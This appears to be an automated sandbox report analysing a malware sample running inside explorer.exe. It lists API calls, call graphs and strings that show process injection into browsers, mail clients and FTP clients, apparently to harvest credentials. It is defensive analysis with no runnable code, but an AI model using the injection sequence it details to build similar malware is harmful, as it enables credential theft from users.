8613f5 814->819 895 861de3 815->895 821 861425 816->821 820 8624d5 10 API calls 818->820 822 861de3 3 API calls 819->822 820->808 823 86144b 821->823 824 862608 VirtualQuery 821->824 822->818 823->724 825 86143a 824->825 825->823 910 861493 825->910 827->767 829 862600 828->829 830 8625cb IsWow64Process 828->830 829->774 831 8625ee 830->831 832 8625dc IsWow64Process 830->832 833 8625f9 CloseHandle 831->833 832->831 832->833 833->829 835 862608 VirtualQuery 834->835 836 861833 835->836 837 861845 OpenProcess 836->837 838 861a76 836->838 837->838 839 86185e 837->839 838->774 840 862608 VirtualQuery 839->840 841 861865 840->841 841->838 842 861873 NtSetInformationProcess 841->842 843 86188f 841->843 842->843 865 861a80 843->865 846 861a80 2 API calls 847 8618d6 846->847 848 861a73 CloseHandle 847->848 849 861a80 2 API calls 847->849 848->838 850 861900 849->850 871 861b17 850->871 853 861a80 2 API calls 854 861930 RtlMoveMemory RtlMoveMemory NtUnmapViewOfSection 853->854 855 861985 854->855 856 861a4e CreateRemoteThread 854->856 858 86198b CreateMutexA GetLastError 855->858 861 8619bb GetModuleHandleA GetProcAddress ReadProcessMemory 855->861 857 861a65 CloseHandle 856->857 859 861a67 CloseHandle CloseHandle 857->859 858->855 860 8619a7 CloseHandle Sleep 858->860 859->848 860->858 862 861a47 861->862 863 8619ec WriteProcessMemory 861->863 862->857 862->859 863->862 864 861a16 CreateRemoteThread CloseHandle Sleep WriteProcessMemory 863->864 864->862 866 861a94 865->866 870 8618b4 865->870 867 861aa4 NtCreateSection 866->867 868 861ac3 866->868 867->868 869 861ad8 NtMapViewOfSection 868->869 868->870 869->870 870->846 872 861b2e 871->872 878 861b60 871->878 873 861b30 RtlMoveMemory 872->873 873->873 873->878 874 861b71 LoadLibraryA 876 861910 NtUnmapViewOfSection 874->876 874->878 875 861be1 LdrProcessRelocationBlock 875->876 877 861bc3 875->877 876->853 877->875 877->876 878->874 878->877 879 861ba1 GetProcAddress 878->879 879->876 879->878 880->802 881->804 883 862664 CryptCreateHash lstrlen CryptHashData CryptGetHashParam 882->883 884 861384 CreateMutexA GetLastError 882->884 885 8626aa wsprintfA 883->885 884->807 884->808 885->885 886 8626cc CryptDestroyHash CryptReleaseContext 885->886 886->884 888 862515 887->888 889 862565 CloseHandle 888->889 890 862555 Thread32Next 888->890 891 862521 OpenThread 888->891 889->812 890->888 892 862544 ResumeThread 891->892 893 86253c SuspendThread 891->893 894 86254a CloseHandle 892->894 893->894 894->890 896 861ded 895->896 904 861e56 895->904 896->904 937 861e93 VirtualProtect 896->937 898 861e04 898->904 938 862815 VirtualAlloc 898->938 900 861e10 901 861e1a RtlMoveMemory 900->901 903 861e2d 900->903 901->903 939 861e93 VirtualProtect 903->939 904->814 906 862608 VirtualQuery 905->906 907 86284b 906->907 908 861414 907->908 909 86284f GetProcessHeap HeapFree 907->909 908->813 909->908 911 8614c0 910->911 912 8614a1 910->912 914 861510 911->914 915 8614c8 911->915 940 8617c7 912->940 959 8626e6 lstrlen lstrlen 914->959 918 8617c7 5 API calls 915->918 934 8614b6 915->934 920 8614e0 918->920 919 86155f 921 8626e6 2 API calls 919->921 920->934 947 861647 920->947 924 86156c 921->924 922 861532 961 861752 GetModuleHandleA GetProcAddress 922->961 926 861584 924->926 930 8615a0 924->930 924->934 964 862404 lstrlen 926->964 928 8614fb 928->934 970 8615e0 928->970 931 862404 5 API calls 930->931 930->934 935 8615ac 931->935 932 861647 11 API calls 932->934 934->823 935->934 936 861647 11 API calls 935->936 936->928 937->898 938->900 939->904 941 8617d1 940->941 942 861812 940->942 941->942 943 8626e6 2 API calls 941->943 942->934 944 8617f1 943->944 944->942 975 862861 GetProcessHeap RtlAllocateHeap 944->975 946 861804 RtlMoveMemory 946->942 948 861660 947->948 949 861745 947->949 948->949 950 861671 lstrlen 948->950 949->928 950->949 951 861683 lstrlen 950->951 951->949 952 861690 getpeername 951->952 952->949 953 8616ae inet_ntoa htons 952->953 953->949 955 8616cc 953->955 955->949 976 862861 GetProcessHeap RtlAllocateHeap 955->976 956 861717 wsprintfA 957 86173a 956->957 957->949 958 862843 3 API calls 957->958 958->949 960 86151d 959->960 960->919 960->922 962 861776 RtlZeroMemory RtlZeroMemory RtlZeroMemory RtlZeroMemory 961->962 963 861539 961->963 962->963 963->932 963->934 965 862456 964->965 966 86241c CryptStringToBinaryA 964->966 965->934 966->965 967 862438 966->967 977 862861 GetProcessHeap RtlAllocateHeap 967->977 969 862444 CryptStringToBinaryA 969->965 971 862843 3 API calls 970->971 972 8615f5 971->972 973 862843 3 API calls 972->973 974 8615fc 973->974 974->934 975->946 976->956 977->969 1063 86245e lstrlen 1064 862476 CryptBinaryToStringA 1063->1064 1065 8624a5 1063->1065 1064->1065 1066 862489 1064->1066 1069 862861 GetProcessHeap RtlAllocateHeap 1066->1069 1068 862494 CryptBinaryToStringA 1068->1065 1069->1068 978 867728 979 867904 978->979 980 86774b 978->980 979->979 981 86785a LoadLibraryA 980->981 984 86789f VirtualProtect VirtualProtect 980->984 982 867871 981->982 982->980 985 867883 GetProcAddress 982->985 984->979 985->982 986 867899 985->986

                                                                                                                                                      Callgraph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      • Opacity -> Relevance
                                                                                                                                                      • Disassembly available
                                                                                                                                                      callgraph 0 Function_00862806 1 Function_00861647 4 Function_00862843 1->4 32 Function_00862861 1->32 33 Function_008624AE 1->33 2 Function_008617C7 25 Function_008626E6 2->25 2->32 3 Function_00862404 3->32 11 Function_00862608 4->11 5 Function_00861A80 6 Function_00861DC0 24 Function_00861C19 6->24 7 Function_00861D80 7->24 8 Function_00861000 12 Function_00861016 8->12 9 Function_00862841 10 Function_00861F4A 10->4 16 Function_00862815 10->16 28 Function_008622E5 10->28 29 Function_008627E2 10->29 10->32 38 Function_00862374 10->38 41 Function_00862731 10->41 43 Function_008622B8 10->43 12->11 17 Function_00862592 12->17 23 Function_00861819 12->23 26 Function_008610A4 12->26 12->32 34 Function_008625AD 12->34 39 Function_00861332 12->39 40 Function_00862573 12->40 12->41 13 Function_00861B17 14 Function_00863417 15 Function_008624D5 18 Function_00861752 19 Function_00861493 19->1 19->2 19->3 19->18 19->25 31 Function_008615E0 19->31 20 Function_00861E93 21 Function_0086245E 21->32 22 Function_00861E5D 22->7 23->5 23->11 23->13 26->11 26->17 26->23 26->32 26->34 26->40 26->41 27 Function_00861425 27->11 27->19 28->29 28->32 30 Function_00861DE3 30->6 30->16 30->20 30->22 31->4 35 Function_00867728 36 Function_00861469 36->11 36->19 37 Function_00861EB6 37->4 37->10 37->32 39->4 39->11 39->15 39->19 39->30 39->32 42 Function_0086263E 39->42 43->25

                                                                                                                                                      Executed Functions

                                                                                                                                                      Function 00861016 Relevance: 89.5, APIs: 30, Strings: 21, Instructions: 244stringsleepprocessCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 0 861016-861020 call 862608 3 861097-861098 0->3 4 861022-86104b call 862861 RtlMoveMemory 0->4 7 861071-861090 GetCurrentProcessId 4->7 8 86104d-86106b call 862861 RtlMoveMemory 4->8 12 861092-861093 7->12 13 86109e-8610d7 call 8610a4 call 862861 7->13 8->7 12->3 14 861095-861099 call 861332 12->14 22 8610dc-8610ea CreateToolhelp32Snapshot 13->22 14->13 23 861322-86132d Sleep 22->23 24 8610f0-861106 Process32First 22->24 23->22 25 86110c-86111e lstrcmpiA 24->25 26 86131b-86131c CloseHandle 24->26 27 861124-861132 lstrcmpiA 25->27 28 861280-861289 call 8625ad 25->28 26->23 27->28 30 861138-861146 lstrcmpiA 27->30 34 861305-861313 Process32Next 28->34 35 86128b-861294 call 862592 28->35 30->28 31 86114c-86115a lstrcmpiA 30->31 31->28 33 861160-86116a lstrcmpiA 31->33 33->28 36 861170-86117e lstrcmpiA 33->36 34->25 37 861319 34->37 35->34 42 861296-86129d call 862573 35->42 36->28 39 861184-861192 lstrcmpiA 36->39 37->26 39->28 41 861198-8611a6 lstrcmpiA 39->41 41->28 43 8611ac-8611ba lstrcmpiA 41->43 42->34 48 86129f-8612ac call 862608 42->48 43->28 45 8611c0-8611ce lstrcmpiA 43->45 45->28 47 8611d4-8611e2 lstrcmpiA 45->47 47->28 49 8611e8-8611f6 lstrcmpiA 47->49 48->34 54 8612ae-861300 lstrcmpiA call 862731 call 861819 call 862731 48->54 49->28 51 8611fc-86120a lstrcmpiA 49->51 51->28 53 86120c-86121a lstrcmpiA 51->53 53->28 55 86121c-86122a lstrcmpiA 53->55 54->34 55->28 57 86122c-86123a lstrcmpiA 55->57 57->28 60 86123c-86124a lstrcmpiA 57->60 60->28 62 86124c-86125a lstrcmpiA 60->62 62->28 64 86125c-86126a lstrcmpiA 62->64 64->28 65 86126c-86127a lstrcmpiA 64->65 65->28 65->34
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00862608: VirtualQuery.KERNEL32(00864434,?,0000001C), ref: 00862615
                                                                                                                                                        • Part of subcall function 00862861: GetProcessHeap.KERNEL32(00000008,0000A000,008610CC), ref: 00862864
                                                                                                                                                        • Part of subcall function 00862861: RtlAllocateHeap.NTDLL(00000000), ref: 0086286B
                                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00861038
                                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,?,?), ref: 0086106B
                                                                                                                                                      • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00861074
                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,00861010), ref: 0086107A
                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 008610DF
                                                                                                                                                      • Process32First.KERNEL32(00000000,?), ref: 008610FE
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 0086111A
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 0086112E
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,chrome.exe), ref: 00861142
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,opera.exe), ref: 00861156
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00861166
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,outlook.exe), ref: 0086117A
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,thebat.exe), ref: 0086118E
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 008611A2
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 008611B6
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 008611CA
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 008611DE
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 008611F2
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,winscp.exe), ref: 00861206
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 00861216
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 00861226
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 00861236
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,263em.exe), ref: 00861246
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 00861256
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,alimail.exe), ref: 00861266
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 00861276
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 008612B4
                                                                                                                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 0086130B
                                                                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 0086131C
                                                                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 00861327
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000014.00000002.2523725408.0000000000861000.00000040.80000000.00040000.00000000.sdmp, Offset: 00861000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_20_2_861000_explorer.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcmpi$HeapMemoryMoveProcessProcess32$AllocateCloseCreateCurrentFirstHandleNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtual
                                                                                                                                                      • String ID: 0-vwP,vw$263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                                                                                                                                      • API String ID: 2555639992-2454475726
                                                                                                                                                      • Opcode ID: b2b2a65f38b0715b7f5e60881aab4e9a7dc857a476a256ea6652769436928e1d
                                                                                                                                                      • Instruction ID: b1a50f89470fe7dcf20d09b68f8fd97ce85cc637c6b43f21e3ed03b9a3d53381
                                                                                                                                                      • Opcode Fuzzy Hash: b2b2a65f38b0715b7f5e60881aab4e9a7dc857a476a256ea6652769436928e1d
                                                                                                                                                      • Instruction Fuzzy Hash: 7071C230A01305ABCF00DBB19D59E6E7BACFF45B80F0A1529F941C7392EF65DA098B65
                                                                                                                                                      Function 008610A4 Relevance: 80.7, APIs: 26, Strings: 20, Instructions: 203stringsleepprocessCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00862861: GetProcessHeap.KERNEL32(00000008,0000A000,008610CC), ref: 00862864
                                                                                                                                                        • Part of subcall function 00862861: RtlAllocateHeap.NTDLL(00000000), ref: 0086286B
                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 008610DF
                                                                                                                                                      • Process32First.KERNEL32(00000000,?), ref: 008610FE
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 0086111A
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 0086112E
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,chrome.exe), ref: 00861142
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,opera.exe), ref: 00861156
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00861166
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,outlook.exe), ref: 0086117A
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,thebat.exe), ref: 0086118E
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 008611A2
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 008611B6
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 008611CA
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 008611DE
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 008611F2
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,winscp.exe), ref: 00861206
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 00861216
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 00861226
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 00861236
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,263em.exe), ref: 00861246
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 00861256
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,alimail.exe), ref: 00861266
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 00861276
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 008612B4
                                                                                                                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 0086130B
                                                                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 0086131C
                                                                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 00861327
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000014.00000002.2523725408.0000000000861000.00000040.80000000.00040000.00000000.sdmp, Offset: 00861000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_20_2_861000_explorer.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcmpi$HeapProcess32$AllocateCloseCreateFirstHandleNextProcessSleepSnapshotToolhelp32
                                                                                                                                                      • String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                                                                                                                                      • API String ID: 3950187957-1680033604
                                                                                                                                                      • Opcode ID: af0e10a5ef2fd3a236aa0db62baec8e60b2ba602f80e2b8c89d600e0a0cb3a8b
                                                                                                                                                      • Instruction ID: a79706b0cb377e06b6b122ed301d050da19a127c5097160e511a2ec30d7b6898
                                                                                                                                                      • Opcode Fuzzy Hash: af0e10a5ef2fd3a236aa0db62baec8e60b2ba602f80e2b8c89d600e0a0cb3a8b
                                                                                                                                                      • Instruction Fuzzy Hash: 23519330A05305A6CF40DBB19D49E6E7AACFE45B80F0A0529FA41C7381EF69DA098B75
                                                                                                                                                      Function 00867728 Relevance: 6.2, APIs: 4, Instructions: 204COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 113 867728-867745 114 86790d 113->114 115 86774b-867758 113->115 114->114 116 86776a-86776f 115->116 117 867771 116->117 118 867773 117->118 119 867760-867765 117->119 121 867778-86777a 118->121 120 867766-867768 119->120 120->116 120->117 122 867783-867787 121->122 123 86777c-867781 121->123 122->121 124 867789 122->124 123->122 125 867794-867799 124->125 126 86778b-867792 124->126 127 86779b-8677a4 125->127 128 8677a8-8677aa 125->128 126->121 126->125 129 8677a6 127->129 130 86781a-86781d 127->130 131 8677b3-8677b7 128->131 132 8677ac-8677b1 128->132 129->128 133 867822-867825 130->133 134 8677c0-8677c2 131->134 135 8677b9-8677be 131->135 132->131 136 867827-867829 133->136 137 8677e4-8677f3 134->137 138 8677c4 134->138 135->134 136->133 141 86782b-86782e 136->141 139 867804-867811 137->139 140 8677f5-8677fc 137->140 142 8677c5-8677c7 138->142 139->139 144 867813-867815 139->144 140->140 143 8677fe 140->143 141->133 145 867830-86784c 141->145 146 8677d0-8677d4 142->146 147 8677c9-8677ce 142->147 143->120 144->120 145->136 148 86784e 145->148 146->142 149 8677d6 146->149 147->146 150 867854-867858 148->150 151 8677e1 149->151 152 8677d8-8677df 149->152 153 86789f-8678a2 150->153 154 86785a-867870 LoadLibraryA 150->154 151->137 152->142 152->151 155 8678a5-8678ac 153->155 156 867871-867876 154->156 157 8678d0-867900 VirtualProtect * 2 155->157 158 8678ae-8678b0 155->158 156->150 159 867878-86787a 156->159 162 867904-867908 157->162 160 8678b2-8678c1 158->160 161 8678c3-8678ce 158->161 163 867883-867890 GetProcAddress 159->163 164 86787c-867882 159->164 160->155 161->160 162->162 167 86790a 162->167 165 867892-867897 163->165 166 867899-86789c 163->166 164->163 165->156 167->114
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000014.00000002.2523725408.0000000000866000.00000040.80000000.00040000.00000000.sdmp, Offset: 00866000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_20_2_866000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: f8b0e2d835fbf4249adab1026835ccdef6387420e166c4edad27edcaa179ae79
                                                                                                                                                      • Instruction ID: 9df2065add90cc04901ec8cf4bf9b2c0ba3869cae7ff72d666776876091a780e
                                                                                                                                                      • Opcode Fuzzy Hash: f8b0e2d835fbf4249adab1026835ccdef6387420e166c4edad27edcaa179ae79
                                                                                                                                                      • Instruction Fuzzy Hash: 2951297195D3964FD7218A78CC847B07BA0FB52329B2A0679C5E5CB3C2E7985C09C7E4
                                                                                                                                                      Function 00862861 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 168 862861-862871 GetProcessHeap RtlAllocateHeap
                                                                                                                                                      APIs
                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,0000A000,008610CC), ref: 00862864
                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0086286B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000014.00000002.2523725408.0000000000861000.00000040.80000000.00040000.00000000.sdmp, Offset: 00861000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_20_2_861000_explorer.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Heap$AllocateProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1357844191-0
                                                                                                                                                      • Opcode ID: e88a70ec2e05e73dad1fc9e7b6be3bb9759f8e990682803e0812248e0a9f46a1
                                                                                                                                                      • Instruction ID: 9ae58ad3e1c44a4b00c18c348081ac3f5998b6b4bb0c30e6c681d4ac0abb00ca
                                                                                                                                                      • Opcode Fuzzy Hash: e88a70ec2e05e73dad1fc9e7b6be3bb9759f8e990682803e0812248e0a9f46a1
                                                                                                                                                      • Instruction Fuzzy Hash: E2A012704005407FDD4017A0AC0DF053A19B740301F011000F10AC4060C9E0014C8B23

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      Function 00861819 Relevance: 49.2, APIs: 23, Strings: 5, Instructions: 208injectionnativesleepCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00862608: VirtualQuery.KERNEL32(00864434,?,0000001C), ref: 00862615
                                                                                                                                                      • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,771AE800,microsoftedgecp.exe,?), ref: 0086184E
                                                                                                                                                      • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 00861889
                                                                                                                                                      • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00861919
                                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,00863428,00000016), ref: 00861940
                                                                                                                                                      • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00861968
                                                                                                                                                      • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00861978
                                                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00861992
                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 0086199A
                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 008619A8
                                                                                                                                                      • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 008619AF
                                                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 008619C5
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 008619CC
                                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 008619E2
                                                                                                                                                      • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00861A0C
                                                                                                                                                      • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00861A1F
                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00861A26
                                                                                                                                                      • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00861A2D
                                                                                                                                                      • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00861A41
                                                                                                                                                      • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00861A58
                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00861A65
                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00861A6B
                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00861A71
                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00861A74
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000014.00000002.2523725408.0000000000861000.00000040.80000000.00040000.00000000.sdmp, Offset: 00861000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_20_2_861000_explorer.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                                                                                                                      • String ID: 0-vwP,vw$atan$microsoftedgecp.exe$ntdll$opera_shared_counter
                                                                                                                                                      • API String ID: 1066286714-2883495693
                                                                                                                                                      • Opcode ID: 8f02bf6fb085eebb9f13ba5d874509202cbe75506524549842d5426a6e242cf8
                                                                                                                                                      • Instruction ID: 8d5fc4cf5b59b7659e5f2f3c4ef5b2045e68d91380a231f1e28127eba552aac2
                                                                                                                                                      • Opcode Fuzzy Hash: 8f02bf6fb085eebb9f13ba5d874509202cbe75506524549842d5426a6e242cf8
                                                                                                                                                      • Instruction Fuzzy Hash: 48619C31205314AFD710DF659C88E6BBBECFB89754F060618F949D3292DAB4DE048BA2
                                                                                                                                                      Function 0086263E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 68encryptionstringCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 0086265A
                                                                                                                                                      • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00862672
                                                                                                                                                      • lstrlen.KERNEL32(?,00000000), ref: 0086267A
                                                                                                                                                      • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00862685
                                                                                                                                                      • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 0086269F
                                                                                                                                                      • wsprintfA.USER32 ref: 008626B6
                                                                                                                                                      • CryptDestroyHash.ADVAPI32(?), ref: 008626CF
                                                                                                                                                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 008626D9
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000014.00000002.2523725408.0000000000861000.00000040.80000000.00040000.00000000.sdmp, Offset: 00861000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_20_2_861000_explorer.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                                                                                                                      • String ID: %02X
                                                                                                                                                      • API String ID: 3341110664-436463671
                                                                                                                                                      • Opcode ID: 8b590651d36ecde0f10a5a6aee72c7864897552ab8f789ca5fbc76771f17bfa7
                                                                                                                                                      • Instruction ID: 1cb00be3f924e4affc1dd2da8a671558195a3462ee061b85c3fc6ef9ba72309b
                                                                                                                                                      • Opcode Fuzzy Hash: 8b590651d36ecde0f10a5a6aee72c7864897552ab8f789ca5fbc76771f17bfa7
                                                                                                                                                      • Instruction Fuzzy Hash: C6110AB1900508BFDB119B99EC88EAEBFBCFB48741F1140A5F605E2160DBB18F599B61
                                                                                                                                                      Function 00861332 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 94libraryloadersleepCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00862861: GetProcessHeap.KERNEL32(00000008,0000A000,008610CC), ref: 00862864
                                                                                                                                                        • Part of subcall function 00862861: RtlAllocateHeap.NTDLL(00000000), ref: 0086286B
                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?,0086109E,?,00861010), ref: 0086134A
                                                                                                                                                      • GetCurrentProcessId.KERNEL32(00000003,?,0086109E,?,00861010), ref: 0086135B
                                                                                                                                                      • wsprintfA.USER32 ref: 00861372
                                                                                                                                                        • Part of subcall function 0086263E: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 0086265A
